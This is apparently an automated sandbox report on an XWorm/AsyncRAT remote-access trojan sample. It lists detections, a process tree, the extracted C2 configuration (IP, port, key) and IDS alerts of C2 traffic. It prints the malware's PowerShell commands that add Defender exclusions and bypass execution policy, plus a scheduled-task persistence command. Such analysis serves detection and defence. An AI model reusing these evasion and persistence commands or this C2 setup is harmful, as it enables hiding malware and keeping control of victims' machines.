Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565291
MD5:4347fb3a5b1eabf2e594a895a30b98f4
SHA1:36993df090a7f68c57f96ffe5724674520998ac8
SHA256:492a7de87f0ff73da5b30a460ce1fbe03a0d7edf0634906f6a67d711b4a46751
Tags:NETexeMSILuser-jstrosch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates autostart registry keys to launch java
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 2968 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
    • powershell.exe (PID: 5932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7008 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5392 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • java.exe (PID: 3428 cmdline: C:\Users\user\AppData\Roaming\java.exe MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
  • java.exe (PID: 3088 cmdline: "C:\Users\user\AppData\Roaming\java.exe" MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
  • java.exe (PID: 7016 cmdline: "C:\Users\user\AppData\Roaming\java.exe" MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
  • java.exe (PID: 6464 cmdline: C:\Users\user\AppData\Roaming\java.exe MD5: 4347FB3A5B1EABF2E594A895A30B98F4)
  • cleanup
{"C2 url": ["103.230.121.124"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_XWormYara detected XWormJoe Security
    file.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      file.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xe66c:$s6: VirtualBox
      • 0xe5ca:$s8: Win32_ComputerSystem
      • 0xfbc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xfc5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xfd72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xf1f2:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\java.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\java.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\java.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xe66c:$s6: VirtualBox
          • 0xe5ca:$s8: Win32_ComputerSystem
          • 0xfbc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xfc5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xfd72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xf1f2:$cnc4: POST / HTTP/1.1
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xe46c:$s6: VirtualBox
              • 0xe3ca:$s8: Win32_ComputerSystem
              • 0xf9c0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xfa5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xfb72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xeff2:$cnc4: POST / HTTP/1.1
              00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xf0e4:$s6: VirtualBox
                • 0xf042:$s8: Win32_ComputerSystem
                • 0x10638:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x106d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x107ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xfc6a:$cnc4: POST / HTTP/1.1
                Click to see the 2 entries
                SourceRuleDescriptionAuthorStrings
                0.2.file.exe.2a61cd8.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.file.exe.630000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    0.0.file.exe.630000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.0.file.exe.630000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xe66c:$s6: VirtualBox
                      • 0xe5ca:$s8: Win32_ComputerSystem
                      • 0xfbc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xfc5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xfd72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xf1f2:$cnc4: POST / HTTP/1.1

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5932, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5932, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\java.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\java
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5932, ProcessName: powershell.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2968, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe", ProcessId: 7008, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2968, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 5932, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5392, ProcessName: svchost.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:24.666364+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      2024-11-29T15:20:28.810945+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      2024-11-29T15:20:35.564791+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      2024-11-29T15:20:46.628008+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      2024-11-29T15:20:57.689916+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      2024-11-29T15:20:58.893906+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      2024-11-29T15:21:10.865014+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:24.694814+010028529231Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP
                      2024-11-29T15:20:35.567275+010028529231Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP
                      2024-11-29T15:20:46.631035+010028529231Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP
                      2024-11-29T15:20:57.691756+010028529231Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP
                      2024-11-29T15:20:59.822140+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:20:59.943490+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.064973+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.184921+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.306110+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.426980+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.547220+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.787599+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.907672+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.027780+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.147964+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.268067+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.390386+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.512111+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.724011+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.923266+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.125543+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.246667+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.366715+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.608571+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.728572+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.848703+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.088530+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.208751+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.329282+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.449996+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.573360+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.814592+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.920478+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.040774+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.162284+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.290201+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.426020+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.596157+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.720026+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.030145+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.150189+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.270211+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.372291+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.492173+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.854165+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.975522+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.029420+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.149596+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.269661+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.389848+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.510254+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.630516+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.712689+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.832827+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.952909+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.073227+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.193395+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.313717+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.420599+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.540909+010028529231Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:10.866269+010028529231Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:28.810945+010028528741Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      2024-11-29T15:20:58.893906+010028528741Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:59.822140+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:20:59.943490+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.064973+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.184921+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.306110+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.426980+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.547220+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.787599+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:00.907672+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.027780+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.147964+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.268067+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.390386+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.512111+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.724011+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:01.923266+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.125543+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.246667+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.366715+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.608571+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.728572+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:02.848703+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.088530+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.208751+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.329282+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.449996+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.573360+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.814592+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:03.920478+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.040774+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.162284+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.290201+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.426020+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.596157+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:04.720026+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.030145+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.150189+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
